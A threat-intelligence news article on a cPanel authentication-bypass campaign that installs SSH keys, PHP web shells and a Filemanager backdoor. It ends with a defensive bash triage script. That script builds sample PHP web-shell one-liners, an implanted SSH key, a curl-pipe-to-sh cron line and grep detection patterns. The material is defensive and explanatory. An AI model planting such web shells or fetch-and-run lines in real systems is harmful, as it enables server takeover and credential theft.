Mr_Rot13 exploits cPanel flaw to deploy Filemanager backdoor
Mr_Rot13 is exploiting cPanel CVE-2026-41940 to install a Filemanager backdoor, add SSH keys, deploy PHP web shells and exfiltrate credentials and server data.
QiAnXin XLab reported that a threat actor known as Mr_Rot13 is exploiting CVE-2026-41940 in cPanel and WebHost Manager (WHM) to deploy a backdoor called Filemanager. The exploitation began shortly after the vulnerability was publicly disclosed late last month and has been observed at scale.
The flaw is an authentication bypass: it lets a remote attacker obtain privileged access to the control panel without valid credentials. Attackers are running automated scans and using shell scripts fetched via wget or curl to download a Go-based infector from attacker-controlled domains, including wpsock[.]com and cp.dene[.]de.
The Go infector implants an attacker-controlled SSH public key to maintain persistent access and drops a PHP web shell that supports file upload, download and remote command execution. The web shell injects JavaScript that serves a fake cPanel login page to capture credentials. Stolen credentials are encoded with ROT13 and sent to wrned[.]com. ROT13 is a fixed letter substitution, not encryption, so any captured traffic or sample can be decoded trivially; it serves only to evade simple string matching.
The infection chain culminates with deployment of Filemanager, a cross-platform backdoor that runs on Windows, macOS and Linux and provides file management, remote command execution and shell access. In the sample analyzed by researchers, Filemanager was delivered via a shell script downloaded from wpsock[.]com.
The infector also gathers local data, including bash history, SSH data, device information, database passwords and cPanel virtual aliases (valiases). Collected data is forwarded to a three-member Telegram group operated by a user named “0xWR”.
QiAnXin XLab reported: “Monitoring data shows that more than 2,000 attacker source IPs worldwide are currently involved in automated attacks and cybercrime activities targeting this vulnerability.” The source IPs are distributed globally and primarily originate from Germany, the United States, Brazil and the Netherlands. Researchers noted that the command-and-control domain embedded in the injected JavaScript was first registered in October 2020 and appeared in a PHP backdoor sample uploaded in April 2022, and that related samples and infrastructure have had a low detection rate over several years.
Researchers observed follow-on activity on compromised servers, including cryptocurrency mining, ransomware deployment and botnet propagation. The campaign uses a multi-stage downloader, ROT13 encoding for exfiltration endpoints and Telegram channels for data collection.
Organizations running cPanel and WHM should apply the vendor's patches and mitigations. Administrators should review access logs for exploitation attempts and unexpected logins, rotate any credentials that may have been exposed (including those entered into the fake login page), and inspect each cPanel account and the file system for unexpected SSH keys in authorized_keys files, PHP web shells in document roots, and unfamiliar cron or other scheduled tasks.
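The three host checks above (unexpected SSH keys, PHP web shells, fetch-and-run cron entries) as a small triage script. This is an added example, not QiAnXin XLab's tooling and not part of cPanel: the function names, the indicator patterns and the sample files it builds are assumptions for illustration, and the sample tree it creates is constructed, not evidence from a real compromise. On a live host you would point the functions at /root/.ssh/authorized_keys and each account's ~/.ssh, at the account document roots, and at /var/spool/cron or /etc/cron.d.

```bash
#!/usr/bin/env bash
# Post-compromise triage helper for a cPanel/WHM host, added as an illustration.
# It is not QiAnXin XLab's tooling and not part of cPanel; the paths, indicator
# patterns and the sample files it builds are assumptions for this example.

# Print authorized_keys entries whose key blob is absent from an allowlist file.
# Matching is done on the field beginning with "AAAA", so lines carrying an
# options prefix (e.g. command="..." ssh-rsa AAAA...) are still compared.
unknown_ssh_keys() {
  local keyfile="$1" allowlist="$2"
  awk -v allow="$allowlist" '
    function blob(s,   n, i, f) {
      n = split(s, f, " ")
      for (i = 1; i <= n; i++) if (f[i] ~ /^AAAA/) return f[i]
      return ""
    }
    BEGIN { while ((getline line < allow) > 0) { b = blob(line); if (b != "") known[b] = 1 } }
    /^[[:space:]]*(#|$)/ { next }
    { b = blob($0); if (b == "" || !(b in known)) print }
  ' "$keyfile"
}

# List PHP files under a document root that decode-and-eval (base64, gzip or
# str_rot13, the encoding this campaign uses) or pass request input straight to
# an exec primitive. Heuristic only; review every hit by hand.
suspicious_php() {
  local root="$1"
  local pat='(eval|assert)[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)|(system|shell_exec|passthru|exec|popen)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)'
  grep -rlE --include='*.php' -e "$pat" "$root" 2>/dev/null || true
}

# Print cron entries that fetch a remote script with wget/curl and pipe it into
# a shell, the delivery pattern described for this campaign.
cron_fetch_and_run() {
  local crondir="$1"
  grep -rHE '(wget|curl)[^|;]*[|][[:space:]]*(ba)?sh' "$crondir" 2>/dev/null || true
}

# Build a constructed sample tree (NOT real evidence) so the checks run offline.
build_sample_tree() {
  local d
  d=$(mktemp -d)
  mkdir -p "$d/root/.ssh" "$d/www" "$d/cron"
  # Allowlist: the single key the administrator knows about.
  echo 'ssh-ed25519 AAAAC3Nza_admin_known admin@example.test' > "$d/allowed_keys"
  # authorized_keys: the known key plus an implanted one with an options prefix.
  cat > "$d/root/.ssh/authorized_keys" <<'EOF'
# managed by admin
ssh-ed25519 AAAAC3Nza_admin_known admin@example.test
no-pty,command="/bin/sh" ssh-rsa AAAAB3Nza_implanted_by_attacker
EOF
  # One benign PHP file and two constructed web-shell stubs.
  echo '<?php echo "hello"; ?>' > "$d/www/index.php"
  echo '<?php @eval(base64_decode($_POST["c"])); ?>' > "$d/www/wp-cache.php"
  echo '<?php if (isset($_GET["x"])) system($_GET["x"]); ?>' > "$d/www/up.php"
  # Cron: a normal backup job and a fetch-and-run line.
  echo '0 3 * * * /usr/local/bin/backup.sh' > "$d/cron/root"
  echo '*/5 * * * * curl -s http://example.invalid/x.sh | sh' > "$d/cron/apache"
  echo "$d"
}

# Demonstration on the constructed tree.
sample=$(build_sample_tree)
echo "== SSH keys not on the allowlist =="
unknown_ssh_keys "$sample/root/.ssh/authorized_keys" "$sample/allowed_keys"
echo "== PHP files with web-shell indicators =="
suspicious_php "$sample/www"
echo "== cron entries that fetch and run a remote script =="
cron_fetch_and_run "$sample/cron"
rm -rf "$sample"
```

Treat every hit as a lead rather than a verdict: legitimate deployment scripts do pipe curl into sh, and an allowlist only catches keys you have actually recorded, so the first step on a real host is to confirm the allowlist against a known-good inventory before trusting an empty result.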